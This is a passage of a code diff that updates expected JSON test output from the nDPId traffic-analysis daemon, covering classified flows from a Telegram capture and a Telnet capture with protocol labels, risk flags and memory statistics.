-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":288,"flow_first_seen":1588779637543,"flow_last_seen":1588779654458,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":57312,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1588779637543,"flow_last_seen":1588779651680,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1744,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651645,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779607374,"flow_last_seen":1588779607388,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1588779608134,"flow_last_seen":1588779649019,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1588779637830,"flow_last_seen":1588779640832,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779617174,"flow_last_seen":1588779618677,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779634764,"flow_last_seen":1588779634797,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2728,"flow_avg_l4_payload_len":909,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779628757,"flow_last_seen":1588779628804,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779596464,"flow_last_seen":1588779598465,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1588779648840,"flow_last_seen":1588779654853,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651686,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":298,"flow_first_seen":1588779637543,"flow_last_seen":1588779654458,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":54896,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651659,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":288,"flow_first_seen":1588779637543,"flow_last_seen":1588779654458,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":57312,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1588779637543,"flow_last_seen":1588779651680,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1744,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651645,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779607374,"flow_last_seen":1588779607388,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} 00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1588779603292,"flow_last_seen":1588779643386,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779645381,"flow_last_seen":1588779647380,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779650651,"flow_last_seen":1588779650681,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779629079,"flow_last_seen":1588779637572,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779645381,"flow_last_seen":1588779647380,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779650651,"flow_last_seen":1588779650681,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779629079,"flow_last_seen":1588779637572,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} 00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":301,"flow_first_seen":1588779617174,"flow_last_seen":1588779629315,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":59552,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.52","src_port":23174,"dst_port":31480,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779634762,"flow_last_seen":1588779634795,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2728,"flow_avg_l4_payload_len":909,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1588779596708,"flow_last_seen":1588779655298,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":19803,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779634762,"flow_last_seen":1588779634795,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2728,"flow_avg_l4_payload_len":909,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":61974,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1588779596708,"flow_last_seen":1588779655298,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":19803,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip6","src_ip":"fe80::4ba:91a:7817:e318","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","packets-captured":1566,"packets-processed":1566,"total-skipped-flows":0,"total-l4-payload-len":268533,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":46,"total-detection-updates":13,"total-updates":0,"current-active-flows":0,"total-active-flows":48,"total-idle-flows":48,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":279,"global_ts_msec":1588779655298} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1566/1566 @@ -285,9 +285,9 @@ ~~ total active/idle flows...: 48/48 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5964316 bytes -~~ total memory freed........: 5964316 bytes -~~ total allocations/frees...: 119854/119854 +~~ total memory allocated....: 6097950 bytes +~~ total memory freed........: 6097950 bytes +~~ total allocations/frees...: 122616/122616 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2278 chars 
diff --git a/test/results/telnet.pcap.out b/test/results/telnet.pcap.out index b281396f1..2bc8bfd7c 100644 --- a/test/results/telnet.pcap.out +++ b/test/results/telnet.pcap.out 
@@ -4,11 +4,11 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":943755158387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":943755158387,"pkt":"AADAn6CXAKDMO7\/6CABFEAA8RjxAAEAGcxzAqAACwKgAAQYOABeZxaDsAAAAAKACfXjgowAAAgQFtAQCCAoAnCckAAAAAAEDAwA="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":943755158389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":943755158389,"pkt":"AKDMO7\/6AADAn6CXCABFAAA8UeMAAEAGp4XAqAABwKgAAgAXBg4X8WM9mcWg7aASQ+D7twAAAgQFqAEDAwABAQgKACWmLACcJyQ="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":943755158389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":943755158389,"pkt":"AADAn6CXAKDMO7\/6CABFEAA0Rj1AAEAGcyPAqAACwKgAAQYOABeZxaDtF\/FjPoAQfXjt1wAAAQEICgCcJyQAJaYs"} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":943755158387,"flow_last_seen":943755158537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":943755158537,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":943755158387,"flow_last_seen":943755159705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":943755159705,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":943755158387,"flow_last_seen":943755160949,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":943755160949,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} 
-00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":943755158387,"flow_last_seen":943755160950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":943755160950,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"fake","password":""}} -00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":92,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":943755158387,"flow_last_seen":943755197958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":1660,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":943755197958,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 